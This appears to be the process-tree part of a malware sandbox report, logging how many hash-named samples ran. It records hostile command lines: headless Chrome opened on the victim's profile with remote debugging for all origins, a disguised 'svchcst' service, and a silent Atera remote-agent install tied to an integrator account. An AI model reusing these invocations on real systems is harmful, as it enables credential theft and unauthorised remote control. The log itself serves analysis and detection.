- C:\Users\Admin\Downloads\sieben\d5e8c736723b1331e51ab7f5ce3d39a312c2d8274c138c0c26c1a3823041ba8b.exe
  "C:\Users\Admin\Downloads\sieben\d5e8c736723b1331e51ab7f5ce3d39a312c2d8274c138c0c26c1a3823041ba8b.exe"
  2⤵
  PID:2864
- C:\Users\Admin\Downloads\sieben\ab948673426ea95154925e422c9b6219ecb56d0e1b59cf5c8d941133570ebdef.exe
  "C:\Users\Admin\Downloads\sieben\ab948673426ea95154925e422c9b6219ecb56d0e1b59cf5c8d941133570ebdef.exe"
  2⤵
  PID:8304
- - C:\Users\Admin\AppData\Local\Temp\look2.exe
    C:\Users\Admin\AppData\Local\Temp\\look2.exe
    3⤵
    PID:8160
- - C:\Users\Admin\Downloads\sieben\HD_ab948673426ea95154925e422c9b6219ecb56d0e1b59cf5c8d941133570ebdef.exe
    C:\Users\Admin\Downloads\sieben\HD_ab948673426ea95154925e422c9b6219ecb56d0e1b59cf5c8d941133570ebdef.exe
    3⤵
    PID:2416
- C:\Users\Admin\Downloads\sieben\ab948673426ea95154925e422c9b6219ecb56d0e1b59cf5c8d941133570ebdef.exe
  "C:\Users\Admin\Downloads\sieben\ab948673426ea95154925e422c9b6219ecb56d0e1b59cf5c8d941133570ebdef.exe"
  2⤵
  PID:8464
- - C:\Users\Admin\AppData\Local\Temp\look2.exe
    C:\Users\Admin\AppData\Local\Temp\\look2.exe
    3⤵
    PID:6508
- - C:\Users\Admin\Downloads\sieben\HD_ab948673426ea95154925e422c9b6219ecb56d0e1b59cf5c8d941133570ebdef.exe
    C:\Users\Admin\Downloads\sieben\HD_ab948673426ea95154925e422c9b6219ecb56d0e1b59cf5c8d941133570ebdef.exe
    3⤵
    PID:7652
- C:\Windows\System32\msiexec.exe
  "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\sieben\819ad25e1dfd53f40ca7d7d176c2a1abf14b16fd5325936c1390ab3001e26af9.msi"
  2⤵
  PID:9068
- C:\Users\Admin\Downloads\sieben\9b58c3f1628ce800f63dc500f420560fca14609f6e9c8db0013e26adf456b2f9.exe
  "C:\Users\Admin\Downloads\sieben\9b58c3f1628ce800f63dc500f420560fca14609f6e9c8db0013e26adf456b2f9.exe"
  2⤵
  PID:3344
- C:\Users\Admin\Downloads\sieben\6c16e9584ea16f3fb4b7d819ae74a7b9822139ffef872b235c6c6140a25b73d1.exe
  "C:\Users\Admin\Downloads\sieben\6c16e9584ea16f3fb4b7d819ae74a7b9822139ffef872b235c6c6140a25b73d1.exe"
  2⤵
  PID:7060
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 7060 -s 952
    3⤵
    - Program crash
    PID:1092
- C:\Users\Admin\Downloads\sieben\06b93c4d0c315b97144c799c38317a4be3fb2eb238b7fd1d5bb9941acc1da19c.exe
  "C:\Users\Admin\Downloads\sieben\06b93c4d0c315b97144c799c38317a4be3fb2eb238b7fd1d5bb9941acc1da19c.exe"
  2⤵
  PID:7428
- - C:\Users\Admin\Downloads\sieben\06b93c4d0c315b97144c799c38317a4be3fb2eb238b7fd1d5bb9941acc1da19c.exe
    "C:\Users\Admin\Downloads\sieben\06b93c4d0c315b97144c799c38317a4be3fb2eb238b7fd1d5bb9941acc1da19c.exe"
    3⤵
    PID:6080
- - C:\Users\Admin\Downloads\sieben\06b93c4d0c315b97144c799c38317a4be3fb2eb238b7fd1d5bb9941acc1da19c.exe
    "C:\Users\Admin\Downloads\sieben\06b93c4d0c315b97144c799c38317a4be3fb2eb238b7fd1d5bb9941acc1da19c.exe"
    3⤵
    PID:7160
- C:\Users\Admin\Downloads\sieben\6a3625eb52aa5a3be2aa7992f8cc58ad5027fe8f382ddf034d31cb4b12754a53.exe
  "C:\Users\Admin\Downloads\sieben\6a3625eb52aa5a3be2aa7992f8cc58ad5027fe8f382ddf034d31cb4b12754a53.exe"
  2⤵
  PID:1724
- - C:\Users\Admin\AppData\Local\Temp\is-RU8FJ.tmp\6a3625eb52aa5a3be2aa7992f8cc58ad5027fe8f382ddf034d31cb4b12754a53.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-RU8FJ.tmp\6a3625eb52aa5a3be2aa7992f8cc58ad5027fe8f382ddf034d31cb4b12754a53.tmp" /SL5="$D030E,6101517,54272,C:\Users\Admin\Downloads\sieben\6a3625eb52aa5a3be2aa7992f8cc58ad5027fe8f382ddf034d31cb4b12754a53.exe"
    3⤵
    PID:6440
- C:\Users\Admin\Downloads\sieben\9b58c3f1628ce800f63dc500f420560fca14609f6e9c8db0013e26adf456b2f9.exe
  "C:\Users\Admin\Downloads\sieben\9b58c3f1628ce800f63dc500f420560fca14609f6e9c8db0013e26adf456b2f9.exe"
  2⤵
  PID:5404
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5404 -s 1260
    3⤵
    - Program crash
    PID:3016
- C:\Users\Admin\Downloads\sieben\6c16e9584ea16f3fb4b7d819ae74a7b9822139ffef872b235c6c6140a25b73d1.exe
  "C:\Users\Admin\Downloads\sieben\6c16e9584ea16f3fb4b7d819ae74a7b9822139ffef872b235c6c6140a25b73d1.exe"
  2⤵
  PID:5164
- C:\Program Files\Java\jre-1.8\bin\javaw.exe
  "C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Downloads\sieben\1e4761f2536f5087e3908bcbc6e1de3ba2bd51c278cea6f33033af35535ea777.jar"
  2⤵
  PID:5108
- C:\Users\Admin\Downloads\sieben\4c63a06e30d15865d23980562479389970b5089a612998fc25587cbc0b79b723.exe
  "C:\Users\Admin\Downloads\sieben\4c63a06e30d15865d23980562479389970b5089a612998fc25587cbc0b79b723.exe"
  2⤵
  PID:2484
- - C:\Users\Admin\AppData\Local\Temp\onefile_2484_133832250889932556\dc.exe
    C:\Users\Admin\Downloads\sieben\4c63a06e30d15865d23980562479389970b5089a612998fc25587cbc0b79b723.exe
    3⤵
    PID:6048
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:5284
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "command /c ver"
      4⤵
      PID:4736
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "cmd /c ver"
      4⤵
      PID:5364
- C:\Users\Admin\Downloads\sieben\0bbff62a45fc9776575ed143af2d7db332e2781d7e3de56eb3ff48c25d0c7b46.exe
  "C:\Users\Admin\Downloads\sieben\0bbff62a45fc9776575ed143af2d7db332e2781d7e3de56eb3ff48c25d0c7b46.exe"
  2⤵
  PID:6272
- C:\Users\Admin\Downloads\sieben\e6a522d6be11c443fb8c6dfa2e021580fdf71e431fdf0faa411a0f8c56f1fd1b.exe
  "C:\Users\Admin\Downloads\sieben\e6a522d6be11c443fb8c6dfa2e021580fdf71e431fdf0faa411a0f8c56f1fd1b.exe"
  2⤵
  PID:5824
- C:\Users\Admin\Downloads\sieben\d5e8c736723b1331e51ab7f5ce3d39a312c2d8274c138c0c26c1a3823041ba8b.exe
  "C:\Users\Admin\Downloads\sieben\d5e8c736723b1331e51ab7f5ce3d39a312c2d8274c138c0c26c1a3823041ba8b.exe"
  2⤵
  PID:180
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=56032 --remote-allow-origins=* --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    PID:8448
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe554bcc40,0x7ffe554bcc4c,0x7ffe554bcc58
      4⤵
      PID:8068
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 180 -s 1764
    3⤵
    - Program crash
    PID:7620
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 180 -s 1772
    3⤵
    - Program crash
    PID:6488
- C:\Users\Admin\Downloads\sieben\d9f20fbf64170d65d1a1f2fd66a997913cab8ddb1389df8b1fd1e7ae0f1d0b5b.exe
  "C:\Users\Admin\Downloads\sieben\d9f20fbf64170d65d1a1f2fd66a997913cab8ddb1389df8b1fd1e7ae0f1d0b5b.exe"
  2⤵
  PID:4000
- C:\Users\Admin\Downloads\sieben\d5e8c736723b1331e51ab7f5ce3d39a312c2d8274c138c0c26c1a3823041ba8b.exe
  "C:\Users\Admin\Downloads\sieben\d5e8c736723b1331e51ab7f5ce3d39a312c2d8274c138c0c26c1a3823041ba8b.exe"
  2⤵
  PID:8520
- C:\Users\Admin\Downloads\sieben\cce6d7fc922f75d8a904e74b48dfbac2ecf4e332792522985422902d34100bd1.exe
  "C:\Users\Admin\Downloads\sieben\cce6d7fc922f75d8a904e74b48dfbac2ecf4e332792522985422902d34100bd1.exe"
  2⤵
  PID:8316
- - C:\Users\Admin\Downloads\sieben\cce6d7fc922f75d8a904e74b48dfbac2ecf4e332792522985422902d34100bd1.exe
    "C:\Users\Admin\Downloads\sieben\cce6d7fc922f75d8a904e74b48dfbac2ecf4e332792522985422902d34100bd1.exe"
    3⤵
    PID:9088
- - C:\Users\Admin\Downloads\sieben\cce6d7fc922f75d8a904e74b48dfbac2ecf4e332792522985422902d34100bd1.exe
    "C:\Users\Admin\Downloads\sieben\cce6d7fc922f75d8a904e74b48dfbac2ecf4e332792522985422902d34100bd1.exe"
    3⤵
    PID:6700
- - C:\Users\Admin\Downloads\sieben\cce6d7fc922f75d8a904e74b48dfbac2ecf4e332792522985422902d34100bd1.exe
    "C:\Users\Admin\Downloads\sieben\cce6d7fc922f75d8a904e74b48dfbac2ecf4e332792522985422902d34100bd1.exe"
    3⤵
    PID:3108
- C:\Users\Admin\Downloads\sieben\d5e8c736723b1331e51ab7f5ce3d39a312c2d8274c138c0c26c1a3823041ba8b.exe
  "C:\Users\Admin\Downloads\sieben\d5e8c736723b1331e51ab7f5ce3d39a312c2d8274c138c0c26c1a3823041ba8b.exe"
  2⤵
  PID:7768
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=27960 --remote-allow-origins=* --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    PID:2436
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe554bcc40,0x7ffe554bcc4c,0x7ffe554bcc58
      4⤵
      PID:8340
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 7768 -s 1700
    3⤵
    - Program crash
    PID:2856
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 7768 -s 1768
    3⤵
    - Program crash
    PID:5284
- C:\Users\Admin\Downloads\sieben\d5e8c736723b1331e51ab7f5ce3d39a312c2d8274c138c0c26c1a3823041ba8b.exe
  "C:\Users\Admin\Downloads\sieben\d5e8c736723b1331e51ab7f5ce3d39a312c2d8274c138c0c26c1a3823041ba8b.exe"
  2⤵
  PID:5924
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --remote-debugging-port=16568 --remote-allow-origins=* --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    PID:1072
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ffe587ccc40,0x7ffe587ccc4c,0x7ffe587ccc58
      4⤵
      PID:1648
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless=new --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2368,i,10976693613587783373,15594417881300875100,262144 --disable-features=PaintHolding --variations-seed-version=20250204-185839.162000 --mojo-platform-channel-handle=2364 /prefetch:2
      4⤵
      PID:8704
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=1528,i,10976693613587783373,15594417881300875100,262144 --disable-features=PaintHolding --variations-seed-version=20250204-185839.162000 --mojo-platform-channel-handle=2520 /prefetch:3
      4⤵
      PID:752
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=1976,i,10976693613587783373,15594417881300875100,262144 --disable-features=PaintHolding --variations-seed-version=20250204-185839.162000 --mojo-platform-channel-handle=2624 /prefetch:8
      4⤵
      PID:1092
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --remote-debugging-port=16568 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,10976693613587783373,15594417881300875100,262144 --disable-features=PaintHolding --variations-seed-version=20250204-185839.162000 --mojo-platform-channel-handle=3192 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:3100
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --remote-debugging-port=16568 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3200,i,10976693613587783373,15594417881300875100,262144 --disable-features=PaintHolding --variations-seed-version=20250204-185839.162000 --mojo-platform-channel-handle=3284 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:5648
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --remote-debugging-port=16568 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4488,i,10976693613587783373,15594417881300875100,262144 --disable-features=PaintHolding --variations-seed-version=20250204-185839.162000 --mojo-platform-channel-handle=4608 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:7208
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5924 -s 1760
    3⤵
    - Program crash
    PID:3584
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5924 -s 1620
    3⤵
    - Program crash
    PID:5872
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /7
  2⤵
  PID:8988
- C:\Users\Admin\Downloads\sieben\4c63a06e30d15865d23980562479389970b5089a612998fc25587cbc0b79b723.exe
  "C:\Users\Admin\Downloads\sieben\4c63a06e30d15865d23980562479389970b5089a612998fc25587cbc0b79b723.exe"
  2⤵
  PID:7400
- - C:\Users\Admin\AppData\Local\Temp\onefile_7400_133832251402981327\dc.exe
    C:\Users\Admin\Downloads\sieben\4c63a06e30d15865d23980562479389970b5089a612998fc25587cbc0b79b723.exe
    3⤵
    PID:8408
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:112
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "command /c ver"
      4⤵
      PID:2240
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "cmd /c ver"
      4⤵
      PID:5680
- C:\Users\Admin\Downloads\sieben\06b93c4d0c315b97144c799c38317a4be3fb2eb238b7fd1d5bb9941acc1da19c.exe
  "C:\Users\Admin\Downloads\sieben\06b93c4d0c315b97144c799c38317a4be3fb2eb238b7fd1d5bb9941acc1da19c.exe"
  2⤵
  PID:6132
- - C:\Users\Admin\Downloads\sieben\06b93c4d0c315b97144c799c38317a4be3fb2eb238b7fd1d5bb9941acc1da19c.exe
    "C:\Users\Admin\Downloads\sieben\06b93c4d0c315b97144c799c38317a4be3fb2eb238b7fd1d5bb9941acc1da19c.exe"
    3⤵
    PID:824
- C:\Users\Admin\Downloads\sieben\6a3625eb52aa5a3be2aa7992f8cc58ad5027fe8f382ddf034d31cb4b12754a53.exe
  "C:\Users\Admin\Downloads\sieben\6a3625eb52aa5a3be2aa7992f8cc58ad5027fe8f382ddf034d31cb4b12754a53.exe"
  2⤵
  PID:4724
- - C:\Users\Admin\AppData\Local\Temp\is-Q3915.tmp\6a3625eb52aa5a3be2aa7992f8cc58ad5027fe8f382ddf034d31cb4b12754a53.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-Q3915.tmp\6a3625eb52aa5a3be2aa7992f8cc58ad5027fe8f382ddf034d31cb4b12754a53.tmp" /SL5="$50514,6101517,54272,C:\Users\Admin\Downloads\sieben\6a3625eb52aa5a3be2aa7992f8cc58ad5027fe8f382ddf034d31cb4b12754a53.exe"
    3⤵
    PID:8492
  - - C:\Windows\SysWOW64\regsvr32.exe
      "C:\Windows\system32\regsvr32.exe" /s "C:\Windows\system32\COMDLG32.OCX"
      4⤵
      PID:5492
  - - C:\Users\Admin\AppData\Local\Temp\is-TKA25.tmp\VBRUN60SP6.EXE
      "C:\Users\Admin\AppData\Local\Temp\is-TKA25.tmp\VBRUN60SP6.EXE" /Q
      4⤵
      PID:5500
    - - C:\Windows\SysWOW64\grpconv.exe
        
        grpconv.exe -o
        5⤵
        
        PID:3668
  - - C:\Windows\SysWOW64\myodbc3i.exe
      "C:\Windows\system32\myodbc3i" -a -d -t"MySQL ODBC 3.51 Driver;DRIVER=myodbc3.dll;SETUP=myodbc3S.dll"
      4⤵
      PID:64
- C:\Users\Admin\Downloads\sieben\6c16e9584ea16f3fb4b7d819ae74a7b9822139ffef872b235c6c6140a25b73d1.exe
  "C:\Users\Admin\Downloads\sieben\6c16e9584ea16f3fb4b7d819ae74a7b9822139ffef872b235c6c6140a25b73d1.exe"
  2⤵
  PID:5124
- C:\Users\Admin\Downloads\sieben\8b96d4f6ddfcb00b4921f876fea0420b9bab29c3d572da3e95335e978c2f94e5.exe
  "C:\Users\Admin\Downloads\sieben\8b96d4f6ddfcb00b4921f876fea0420b9bab29c3d572da3e95335e978c2f94e5.exe"
  2⤵
  PID:6064
- C:\Program Files (x86)\b.o.s.s\In-sight FitLinxx\StartUpShell.exe
  "C:\Program Files (x86)\b.o.s.s\In-sight FitLinxx\StartUpShell.exe" /key FitLinxx
  2⤵
  PID:3020
- C:\Program Files (x86)\b.o.s.s\In-sight FitLinxx\StartUpShell.exe
  "C:\Program Files (x86)\b.o.s.s\In-sight FitLinxx\StartUpShell.exe" /key FitLinxx
  2⤵
  PID:5704
- C:\Program Files (x86)\b.o.s.s\In-sight FitLinxx\StartUpShell.exe
  "C:\Program Files (x86)\b.o.s.s\In-sight FitLinxx\StartUpShell.exe" /key FitLinxx
  2⤵
  PID:4968
- C:\Program Files (x86)\b.o.s.s\In-sight FitLinxx\StartUpShell.exe
  "C:\Program Files (x86)\b.o.s.s\In-sight FitLinxx\StartUpShell.exe" /key FitLinxx
  2⤵
  PID:1548
- C:\Program Files (x86)\b.o.s.s\In-sight FitLinxx\StartUpShell.exe
  "C:\Program Files (x86)\b.o.s.s\In-sight FitLinxx\StartUpShell.exe" /key FitLinxx
  2⤵
  PID:5964
- C:\Program Files (x86)\b.o.s.s\In-sight FitLinxx\StartUpShell.exe
  "C:\Program Files (x86)\b.o.s.s\In-sight FitLinxx\StartUpShell.exe" /key FitLinxx
  2⤵
  PID:3924
- C:\Program Files (x86)\b.o.s.s\In-sight FitLinxx\StartUpShell.exe
  "C:\Program Files (x86)\b.o.s.s\In-sight FitLinxx\StartUpShell.exe" /key FitLinxx
  2⤵
  PID:4892
- C:\Program Files (x86)\b.o.s.s\In-sight FitLinxx\StartUpShell.exe
  "C:\Program Files (x86)\b.o.s.s\In-sight FitLinxx\StartUpShell.exe" /key FitLinxx
  2⤵
  PID:2788
- C:\Program Files (x86)\b.o.s.s\In-sight FitLinxx\StartUpShell.exe
  "C:\Program Files (x86)\b.o.s.s\In-sight FitLinxx\StartUpShell.exe" /key FitLinxx
  2⤵
  PID:1840
- C:\Program Files (x86)\b.o.s.s\In-sight FitLinxx\StartUpShell.exe
  "C:\Program Files (x86)\b.o.s.s\In-sight FitLinxx\StartUpShell.exe" /key FitLinxx
  2⤵
  PID:2360
- C:\Program Files (x86)\b.o.s.s\In-sight FitLinxx\StartUpShell.exe
  "C:\Program Files (x86)\b.o.s.s\In-sight FitLinxx\StartUpShell.exe" /key FitLinxx
  2⤵
  PID:5012
- C:\Program Files (x86)\b.o.s.s\In-sight FitLinxx\StartUpShell.exe
  "C:\Program Files (x86)\b.o.s.s\In-sight FitLinxx\StartUpShell.exe" /key FitLinxx
  2⤵
  PID:1824

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
PID:3492

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5808

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2916

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3888

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:5464

C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe -k "svchcst"
1⤵
PID:6972

C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe -k "svchcst"
1⤵
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:7048
- C:\Windows\SysWOW64\svchcst.exe
  C:\Windows\system32\svchcst.exe "c:\windows\system32\241381078.bat",MainThread
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:4852

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:6780
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:9128
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 00A4DBF71B2E5A17275673532096B33F
  2⤵
  PID:6220
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Windows\Installer\MSIEBDC.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241430187 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
    3⤵
    PID:8520
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Windows\Installer\MSIF582.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241432343 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
    3⤵
    PID:8900
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Windows\Installer\MSI69A.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241436718 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation
    3⤵
    PID:5068
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Windows\Installer\MSI529C.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241455781 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd
    3⤵
    PID:6920
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 34191C914CC753250B44F31601EFA414 E Global\MSI0000
  2⤵
  PID:6460
- - C:\Windows\SysWOW64\NET.exe
    "NET" STOP AteraAgent
    3⤵
    PID:5616
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 STOP AteraAgent
      4⤵
      PID:436
- - C:\Windows\SysWOW64\TaskKill.exe
    "TaskKill.exe" /f /im AteraAgent.exe
    3⤵
    - Kills process with taskkill
    PID:1840
- C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
  "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="[email protected]" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000Q2oReIAJ" /AgentId="f74cefd6-e7b9-4ea9-bfc8-9a1a24065183"
  2⤵
  PID:3892

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
PID:7920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 6684 -ip 6684
1⤵
PID:8976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6684 -ip 6684
1⤵
PID:9000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4888 -ip 4888
1⤵
PID:8476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4888 -ip 4888
1⤵
PID:6504

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:6436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2112 -ip 2112
1⤵
PID:3668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5404 -ip 5404
1⤵
PID:4528

C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
"C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
1⤵
PID:7008
- C:\Windows\System32\sc.exe
  "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
  2⤵
  - Launches sc.exe
  PID:1248
- C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
  "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" f74cefd6-e7b9-4ea9-bfc8-9a1a24065183 "e465396c-c15b-448a-9ff0-f40840a94802" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Q2oReIAJ
  2⤵
  PID:5720
- C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
